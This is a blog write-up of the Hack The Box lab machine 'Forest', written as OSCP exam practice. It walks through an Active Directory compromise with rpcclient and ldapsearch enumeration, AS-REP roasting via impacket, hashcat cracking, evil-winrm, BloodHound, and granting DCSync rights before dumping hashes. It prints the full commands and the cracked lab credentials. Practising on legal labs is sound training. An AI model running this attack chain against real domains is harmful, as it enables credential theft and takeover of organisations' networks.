OSCP PREP BOX 10: HtB Forest

Written By Ryan Daly

Alright, today we’re going to be taking on Forest. Forest is an Active Directory, easy machine.

As always, we’ll run our default nmap scan and see what we’re working with.

Definitely an AD machine given our output. I started this machine by poking at the DNS server to see if we could do some enumeration which didn’t give us much of anything to work with.

Moving down the list I tested our rpcclient to see if it leaked any info and it does!

Rpcclient -U “” -N <IP>

I then ran enunmdomusers and it gave us a list of domain users which we can fashion into a users.txt wordlist.

I got some additional enumeration but nothing too noteworthy. Now we move onto LDAP.

This was very successful for me since LDAP was misconfigured to allow anonymous bind! So, let’s start some enumeration with ldapsearch. You can dump ldap with: ldapsearch -x -H 'ldap://forest.htb' -s sub -b 'DC=HTB,DC=LOCAL'

This will show us groups, users, rights/permissions and more. But, since we have our users.txt file created from rpcclient, let’s use that to see if we can do any Kerberos attacks.

First let’s use impacket to see if there’s any ASREProastable accounts enabled. We’re going to use GetNPUsers (more detail found here: https://www.thehacker.recipes/ad/movement/kerberos/asreproast).

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastable.txt -dc-ip 10.10.10.161 'HTB/'

So we run that and we get a user hash!

Now that we have that saved into a hash file, we can use that with hashcat to crack: hashcat -m 18200 -a 0 ASREProastable.txt /usr/share/wordlists/rockyou.txt

Now we have credentials! Let’s try and use crackmapexec to authenticate with smb: svc-alfresco:s3rvice.

I tried running spider_plus first, to check for readable files and there was nothing of note. Just some GPT.ini files in the SYSVOL folder. So nothing too good there.

I then went back to crackmap and was thinking that since this is a service account, it might  be an admin of some service.. so I tried playing around with services for crackmapexec to see if I got Pwn3d! for anything (indicating it’s an admin account) and we do!

Now we can use evil-winrm and get a shell!

If we cd to our desktop, we’ll see we have our first user flag located on our desktop! Progress.

Now, it’s always a good idea to test for password reuse with service accounts, admin accounts, etc. So I attempted to run crackmapexec with our userlist.txt file and then using svc-alfresco’s password and used –continue-on-success but I didn’t get any other user accounts.

Now let’s get bloodhound going. From my linux terminal, I used bloodhound-python to extract our json files we’ll be using for our bloodhound gui. I ran: sudo bloodhound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d htb.local -c all.

Then I ran opened bloodhound and uploaded our json files into bloodhound. From here I went to Analysis -> Find As-REP Roastable Users -> Marked Svc-Alfresco as owned -> Shortest Path to Domain Admins from Owned Principals.

So from this, we have a few steps to get to Administrator. First we have to add ourselves ti the Exchange Windows Permissions group, then use that group status to DCSync.

To start, we’ll run: net group "Exchange Windows Permissions" svc-alfresco /add /domain

Great, now all we have to do is grant ourselves DCSync privs and we’re in business.. almost..

I ran into a double hop problem in that trying to pass credentials to the second host wasn’t being recognized from the first host. So I ended up running: Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

This passes our credentials all in one script.

From there, you can just run secretsdump.py on your local kali box and we get hashes!

Now we can log in with evil-winrm by passing the hash of the admin:


 

Ryan Daly
Previous

OSCP PREP BOX 11: HtB Sauna
Next

OSCP PREP BOX 9: HtB Pandora